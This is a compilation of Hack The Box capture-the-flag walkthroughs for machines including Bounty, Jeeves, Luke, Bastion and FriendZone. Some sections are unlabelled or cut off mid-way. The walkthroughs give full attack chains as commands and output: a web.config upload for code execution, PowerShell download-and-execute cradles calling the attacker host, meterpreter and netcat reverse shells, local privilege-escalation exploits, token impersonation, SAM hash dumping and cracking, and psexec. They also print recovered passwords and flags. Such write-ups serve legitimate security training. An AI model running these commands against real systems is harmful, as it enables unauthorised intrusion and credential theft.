Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a machine “Bounty” on that website.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.93 -sV-sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-18 11:58 EEST
Nmap scan report for 10.10.10.93
Host is up (0.040s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.03 seconds
We have only 2 path available. “transfer.aspx” and “Uploadedfiles”.
If we upload .jpg file with “transfer.aspx”, it will be uploaded into “Uploadedfiles”.
However, if we upload .aspx file, we get this message below.
By trying some extensions, we can find that it’s possible to upload .config file.
Besides, we can find a blog post which mentions RCE by uploading web.config.
To obtain that purpose, at first, create web.config.
This time, web.config template from above website and an ASP webshell is being used.
We can find an ASP webshell here
Upload the “web.config”. We get following message.
Then, run the metasploit module “web_delivery”.
It launches a meterpreter shell handler and generates a command to be ran on the target server.
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery)>set target 2
target => 2
msf5 exploit(multi/script/web_delivery)>set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery)>set lhost 10.10.14.30
lhost => 10.10.14.30
msf5 exploit(multi/script/web_delivery)>set srvhost 10.10.14.30
srvhost => 10.10.14.30
msf5 exploit(multi/script/web_delivery)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.30:4444
[*] Using URL: http://10.10.14.30:8080/HqXxAAziFAQHS3
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop-w hidden -c$c=new-object net.webclient;$c.proxy=[Net.WebRequest]::GetSystemWebProxy();$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $c.downloadstring('http://10.10.14.30:8080/HqXxAAziFAQHS3');
After that, open the “web.config” which we uploaded and there should be a form which we can run any Windows command.
By running provided command from “web_delivery”, we can achieve a meterpreter shell.
msf5 exploit(multi/script/web_delivery)>[*] 10.10.10.93 web_delivery - Delivering Payload (2121) bytes
[*] Sending stage (206403 bytes) to 10.10.10.93
[*] Meterpreter session 1 opened (10.10.14.30:4444 -> 10.10.10.93:49164) at 2019-09-18 21:12:31 +0300
Then, move to the opened session.
We can see that we had a user “merlin”.
msf5 exploit(multi/script/web_delivery)> sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: BOUNTY\merlin
user.txt is in the directory “C:\Users\merlin\Desktop”.
meterpreter >ls
Listing: C:\users\merlin\desktop
================================
Mode Size Type Last modified Name
-----------------------------
100666/rw-rw-rw- 282 fil 2018-05-30 00:22:39 +0300 desktop.ini
100666/rw-rw-rw- 32 fil 2018-05-30 23:32:40 +0300 user.txt
meterpreter >cat user.txt
e29ad89891462e0b09741e3082f44a2f
3. Getting Root
Since we already have meterpreter shell, we can use a built-in script “local_exploit_suggester”.
At first, background current meterpreter shell.
Then, run the script to achieve possible vulnerability for getting higher privilege.
msf5 exploit(multi/script/web_delivery)> use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester)>set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester)> run
[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
We found 4 possible vulnerability for gaining administrator.
Try the first one “ms10_092_schelevator”.
msf5 post(multi/recon/local_exploit_suggester)> use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator)>set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_092_schelevator)>set lhost 10.10.14.30
lhost => 10.10.14.30
msf5 exploit(windows/local/ms10_092_schelevator)>set lport 8888
lport => 8888
msf5 exploit(windows/local/ms10_092_schelevator)>set session 1
session => 1
msf5 exploit(windows/local/ms10_092_schelevator)> run
[*] Started reverse TCP handler on 10.10.14.30:8888
[*] Preparing payload at C:\Windows\TEMP\YOfmskSrsb.exe
[*] Creating task: Yi4efMFsrEfh
[*] SUCCESS: The scheduled task "Yi4efMFsrEfh" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\Yi4efMFsrEfh...
[*] Original CRC32: 0x5eb2c56c
[*] Final CRC32: 0x5eb2c56c
[*] Writing our modified content back...
[*] Validating task: Yi4efMFsrEfh
[*][*] Folder: \[*] TaskName Next Run Time Status
[*]=============================================================================[*] Yi4efMFsrEfh 10/1/2019 9:27:00 PM Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "Yi4efMFsrEfh" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "Yi4efMFsrEfh" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (206403 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "Yi4efMFsrEfh".[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (10.10.14.30:8888 -> 10.10.10.93:49165) at 2019-09-18 21:25:05 +0300
[*] SUCCESS: The scheduled task "Yi4efMFsrEfh" was successfully deleted.
[*] SCHELEVATOR
meterpreter >
Now we can confirm we had “AUTHORITY\SYSTEM”.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
root.txt is in the directory “C:\users\administrator\desktop”.
meterpreter >ls
Listing: C:\users\administrator\desktop
=======================================
Mode Size Type Last modified Name
-----------------------------
100666/rw-rw-rw- 282 fil 2018-05-31 00:18:12 +0300 desktop.ini
100666/rw-rw-rw- 32 fil 2018-05-31 00:18:22 +0300 root.txt
meterpreter >cat root.txt
c837f7b699feef5475a0c079f9d4f5ea
On port 50000, we can find Jenkins dashboard on “/askjeeves”.
Besides, there is an interesting menu “Manage Jenkins”.
After that, we can find a menu “Script Console”.
This allows us to run any Groovy script.
To get a reverse shell, we need to launch netcat and execute a payload.
We can find it from Github repository.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
Now we got a reverse shell which is “kohsuke” user.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.19] from (UNKNOWN)[10.10.10.63] 49676
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke
user.txt is in the directory “C:\Users\kohsuke\Desktop”.
C:\Users\kohsuke\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\kohsuke\Desktop
11/03/2017 11:19 PM <DIR> .
11/03/2017 11:19 PM <DIR> ..
11/03/2017 11:22 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 7,475,908,608 bytes free
C:\Users\kohsuke\Desktop>type user.txt
type user.txt
e3232272596fb47950d59c4cf1e7066a
3. Getting Root
For the further enumeration, gain meterpreter shell with Metasploit.
To achieve that purpose, we need to use Metasploit module “web_delivery” to generate a command.
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery)>set target 2
target => 2
msf5 exploit(multi/script/web_delivery)>set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery)>set lhost 10.10.14.19
lhost => 10.10.14.19
msf5 exploit(multi/script/web_delivery)>set srvhost 10.10.14.19
srvhost => 10.10.14.19
msf5 exploit(multi/script/web_delivery)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.19:4444
[*] Using URL: http://10.10.14.19:8080/3FtokPLmY
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop-w hidden -c$q=new-object net.webclient;$q.proxy=[Net.WebRequest]::GetSystemWebProxy();$q.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $q.downloadstring('http://10.10.14.19:8080/3FtokPLmY');
Now we had a command to run meterpreter shell.
Then, run the obtained command on the current reverse shell.
Then, achieve a token for SYSTEM user with the following procedure.
We need to load module incognito for that.
meterpreter > upload /root/RottenPotato/rottenpotato.exe .[*] uploading : /root/RottenPotato/rottenpotato.exe -> .[*] uploaded : /root/RottenPotato/rottenpotato.exe -> .\rottenpotato.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > execute -Hc-f rottenpotato.exe
Process 784 created.
Channel 2 created.
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Generally, we have “root.txt” in the Desktop directory of user “Administrator”.
However, this time we see nothing but strange “hm.txt”.
meterpreter >ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
-----------------------------
100666/rw-rw-rw- 797 fil 2017-11-08 16:05:18 +0200 Windows 10 Update Assistant.lnk
100666/rw-rw-rw- 282 fil 2017-11-04 04:03:17 +0200 desktop.ini
100444/r--r--r-- 36 fil 2017-11-04 04:57:21 +0200 hm.txt
meterpreter >cat hm.txt
The flag is elsewhere. Look deeper.
Sounds like there is nothing here.
However, with “\R” option, we can find additional information.
meterpreter > shell
Process 4384 created.
Channel 4 created.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Desktop>dir /R
dir /R
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 7,474,098,176 bytes free
The file format means this is “Alternate Data Stream” which is almost like “metadata” for NTFS.
By using “more” command with redirection, we can see the content.
C:\Users\Administrator\Desktop>more < hm.txt:root.txt:$DATA
more < hm.txt:root.txt:$DATA
afbc5bd4b615a60648cec41c6ac92530
Hackthebox is a website which has bunch of vulnerable machines in its own VPN.
This is a walkthrough of machine “Luke” on that website.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.137 -sV-sC
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-13 20:31 EEST
Nmap scan report for 10.10.10.137
Host is up (0.035s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.19
| Logged in as ftp
| TYPE: ASCII
| No session upload bandwidth limit
| No session download bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp open ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open http Ajenti http control panel
|_http-title: Ajenti
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 523.08 seconds
FTP enumeration:
root@kali:~# ftp 10.10.10.137
Connected to 10.10.10.137.
220 vsFTPd 3.0.3+ (ext.1) ready...
Name (10.10.10.137:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp
226 Directory send OK.
By FTP enumeration, we can find an interesting txt file.
ftp> pwd
257 "/webapp" is the current directory
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-xr-xr-x 1 0 0 306 Apr 14 12:37 for_Chihiro.txt
226 Directory send OK.
ftp> get for_Chihiro.txt
local: for_Chihiro.txt remote: for_Chihiro.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for for_Chihiro.txt (306 bytes).
226 Transfer complete.
306 bytes received in 0.00 secs (2.4731 MB/s)
root@kali:~# cat for_Chihiro.txt
Dear Chihiro !!
As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies !
Derry
Next, try to enumerate HTTP.
In “config.php” on port 80, we can find a credential for DB.
root@kali:~# curl http://10.10.10.137/config.php
$dbHost='localhost';$dbUsername='root';$dbPassword='Zk6heYCyv6ZE9Xcg';$db="login";$conn= new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n".$conn -> error);
Then, try to look for the place which we can use following credential.
root:Zk6heYCyv6ZE9Xcg
On port 3000, express is running and we have an API for login possibly.
Hackthebox is a website which has bunch of vulnerable machines in its own VPN.
This is a walkthrough of machine “Bastion” on that website.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.134 -sC-sV
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 11:58 EEST
Nmap scan report for 10.10.10.134
Host is up (0.041s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -37m27s, deviation: 1h09m16s, median: 2m31s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-09-06T11:02:54+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-09-06T09:02:53
|_ start_date: 2019-09-06T08:07:48
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.94 seconds
SMB Enumeration:
root@kali:~# smbclient -L\\10.10.10.134
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
2. Getting User
In the SMB share “Backups”, we can find some files.
root@kali:~# smbclient //10.10.10.134/Backups
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Sep 6 11:11:13 2019
.. D 0 Fri Sep 6 11:11:13 2019
note.txt AR 116 Tue Apr 16 13:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 14:43:08 2019
user.config A 4175 Fri Feb 22 15:03:48 2019
WindowsImageBackup D 0 Fri Feb 22 14:44:02 2019
7735807 blocks of size 4096. 2756157 blocks available
In the “note.txt”, we can find a message from system administrator.
root@kali:~# cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
Besides, by enumeration, we can find following “vhd” files.
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\>dir. D 0 Fri Feb 22 14:45:32 2019
.. D 0 Fri Feb 22 14:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd A 37761024 Fri Feb 22 14:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd A 5418299392 Fri Feb 22 14:45:32 2019
BackupSpecs.xml A 1186 Fri Feb 22 14:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml A 1078 Fri Feb 22 14:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml A 8930 Fri Feb 22 14:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml A 6542 Fri Feb 22 14:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml A 2894 Fri Feb 22 14:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml A 1488 Fri Feb 22 14:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml A 1484 Fri Feb 22 14:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml A 3844 Fri Feb 22 14:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml A 3988 Fri Feb 22 14:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml A 7110 Fri Feb 22 14:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml A 2374620 Fri Feb 22 14:45:32 2019
7735807 blocks of size 4096. 2761056 blocks available
We don’t wanna download the huge file but it is possible to enumerate the file content of the file.
At first, create a directory and mount the SMB share.
root@kali:~# mkdir /mnt/bastion
root@kali:~# mount -t cifs //10.10.10.134/Backups /mnt/bastion
mount: /mnt/bastion: bad option;for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.
Got an error. According to this article, we have to install “cifs-utils”.
root@kali:~# apt-get install cifs-utils
Then, try to mount again.
root@kali:~# mount -t cifs //10.10.10.134/Backups /mnt/bastion
Password for root@//10.10.10.134/Backups:
root@kali:~# ls-l /mnt/bastion/
total 1
-r-xr-xr-x 1 root root 116 Apr 16 13:10 note.txt
-rwxr-xr-x 1 root root 0 Feb 22 2019 SDT65CB.tmp
drwxr-xr-x 2 root root 0 Feb 22 2019 WindowsImageBackup
Then, create a device file nbd0 from the vhd file.
Before that, we have to load nbd kernel module to run subsequent command.
root@kali:~# samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Crack the hash with john the ripper.
root@kali:~# samdump2 SYSTEM SAM > hash.txt
root@kali:~# john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
(*disabled* Administrator)
bureaulampje (L4mpje)
2g 0:00:00:00 DONE (2019-09-08 00:53) 3.571g/s 16777Kp/s 16777Kc/s 16786KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
We got the following credential and we can just ssh to the box.
L4mpje:bureaulampje
root@kali:~# ssh L4mpje@10.10.10.134
user.txt is in the following directory
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\L4mpje\Desktop
22-02-2019 16:27 <DIR> .
22-02-2019 16:27 <DIR> ..
23-02-2019 10:07 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 11.307.810.816 bytes free
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d5c3309db3a151772f9d86c6cd
By enumeration, we can confirm that “mRemoteNG” is installed on the host.
l4mpje@BASTION C:\Program Files (x86)>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Program Files (x86)
22-02-2019 15:01 <DIR> .
22-02-2019 15:01 <DIR> ..
16-07-2016 15:23 <DIR> Common Files
23-02-2019 10:38 <DIR> Internet Explorer
16-07-2016 15:23 <DIR> Microsoft.NET
22-02-2019 15:01 <DIR> mRemoteNG
23-02-2019 11:22 <DIR> Windows Defender
23-02-2019 10:38 <DIR> Windows Mail
23-02-2019 11:22 <DIR> Windows Media Player
16-07-2016 15:23 <DIR> Windows Multimedia Platform
16-07-2016 15:23 <DIR> Windows NT
23-02-2019 11:22 <DIR> Windows Photo Viewer
16-07-2016 15:23 <DIR> Windows Portable Devices
16-07-2016 15:23 <DIR> WindowsPowerShell
0 File(s) 0 bytes
14 Dir(s) 11.305.988.096 bytes free
The credential for the mRemoteNG is stored in “confCons.xml”.
The config file is stored in “C:\Users\L4mpje\AppData\Roaming\mRemoteNG”.
Since it’s hidden, we need to add “\a” for dir command to find AppData directory.
Now we got following credential for user Administrator.
Administrator:thXLHM96BeKL0ER2
To get inside as a Admin, we can use “psexec.py” in the package “Impacket”.
(We can also ssh to login)
root@kali:~# /usr/share/doc/python-impacket/examples/psexec.py administrator@10.10.10.134
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.134.....
[*] Found writable share ADMIN$[*] Uploading file zdypCBbR.exe
[*] Opening SVCManager on 10.10.10.134.....
[*] Creating service dHza on 10.10.10.134.....
[*] Starting service dHza.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
root.txt is in the directory “C:\Users\Administrator\Desktop”.
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\Administrator\Desktop
23-02-2019 10:40 <DIR> .
23-02-2019 10:40 <DIR> ..
23-02-2019 10:07 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 11.305.578.496 bytes free
C:\Users\Administrator\Desktop>type root.txt
958850b91811676ed6620a9c430e65c8
root@kali:~# smbclient -L 10.10.10.123
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP FRIENDZONE
root@kali:~# openssl s_client -showcerts-connect 10.10.10.123:443
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=18:self signed certificate
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
verify error:num=10:certificate has expired
notAfter=Nov 4 21:02:30 2018 GMT
verify return:1
depth=0 C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
notAfter=Nov 4 21:02:30 2018 GMT
verify return:1
---
Certificate chain
0 s:C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
i:C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
-----BEGIN CERTIFICATE-----
MIID+DCCAuCgAwIBAgIJAPRJYD8hBBg0MA0GCSqGSIb3DQEBCwUAMIGQMQswCQYD
VQQGEwJKTzEQMA4GA1UECAwHQ09ERVJFRDEOMAwGA1UEBwwFQU1NQU4xEDAOBgNV
BAoMB0NPREVSRUQxEDAOBgNVBAsMB0NPREVSRUQxFzAVBgNVBAMMDmZyaWVuZHpv
bmUucmVkMSIwIAYJKoZIhvcNAQkBFhNoYWhhQGZyaWVuZHpvbmUucmVkMB4XDTE4
MTAwNTIxMDIzMFoXDTE4MTEwNDIxMDIzMFowgZAxCzAJBgNVBAYTAkpPMRAwDgYD
VQQIDAdDT0RFUkVEMQ4wDAYDVQQHDAVBTU1BTjEQMA4GA1UECgwHQ09ERVJFRDEQ
MA4GA1UECwwHQ09ERVJFRDEXMBUGA1UEAwwOZnJpZW5kem9uZS5yZWQxIjAgBgkq
hkiG9w0BCQEWE2hhaGFAZnJpZW5kem9uZS5yZWQwggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQCjImsItIRhGNyMyYuyz4LWbiGSDRnzaXnHVAmZn1UeG1B8
lStNJrR8/ZcASz+jLZ9qHG57k6U9tC53VulFS+8Msb0l38GCdDrUMmM3evwsmwrH
9jaB9G0SMGYiwyG1a5Y0EqhM8uEmR3dXtCPHnhnsXVfo3DbhhZ2SoYnyq/jOfBuH
gBo6kdfXLlf8cjMpOje3dZ8grwWpUDXVUVyucuatyJam5x/w9PstbRelNJm1gVQh
7xqd2at/kW4g5IPZSUAufu4BShCJIupdgIq9Fddf26k81RQ11dgZihSfQa0HTm7Q
ui3/jJDpFUumtCgrzlyaM5ilyZEj3db6WKHHlkCxAgMBAAGjUzBRMB0GA1UdDgQW
BBSZnWAZH4SGp+K9nyjzV00UTI4zdjAfBgNVHSMEGDAWgBSZnWAZH4SGp+K9nyjz
V00UTI4zdjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBV6vjj
TZlc/bC+cZnlyAQaC7MytVpWPruQ+qlvJ0MMsYx/XXXzcmLj47Iv7EfQStf2TmoZ
LxRng6lT3yQ6Mco7LnnQqZDyj4LM0SoWe07kesW1GeP9FPQ8EVqHMdsiuTLZryME
K+/4nUpD5onCleQyjkA+dbBIs+Qj/KDCLRFdkQTX3Nv0PC9j+NYcBfhRMJ6VjPoF
Kwuz/vON5PLdU7AvVC8/F9zCvZHbazskpy/quSJIWTpjzg7BVMAWMmAJ3KEdxCoG
X7p52yPCqfYopYnucJpTq603Qdbgd3bq30gYPwF6nbHuh0mq8DUxD9nPEcL8q6XZ
fv9s+GxKNvsBqDBX
-----END CERTIFICATE-----
---
Server certificate
subject=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
issuer=C = JO, ST = CODERED, L = AMMAN, O = CODERED, OU = CODERED, CN = friendzone.red, emailAddress = haha@friendzone.red
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1677 bytes and written 376 bytes
Verification error: certificate has expired
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: A11ADA50EDC062B385AEF8C1FAB755E821E43AE3D5B1A8884F363EFF2B02AA21
Session-ID-ctx:
Master-Key: 263902990F378709BBE71C627BE9431D1EF42E4672E1913ECDA2ECD06FFC6BAF7575B2F5B3D620AB1580F71D24F405B3
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 300 (seconds)
TLS session ticket:
0000 - 4b af 91 5b f7 fa 91 ee-a3 76 53 70 03 ba cb 71 K..[.....vSp...q
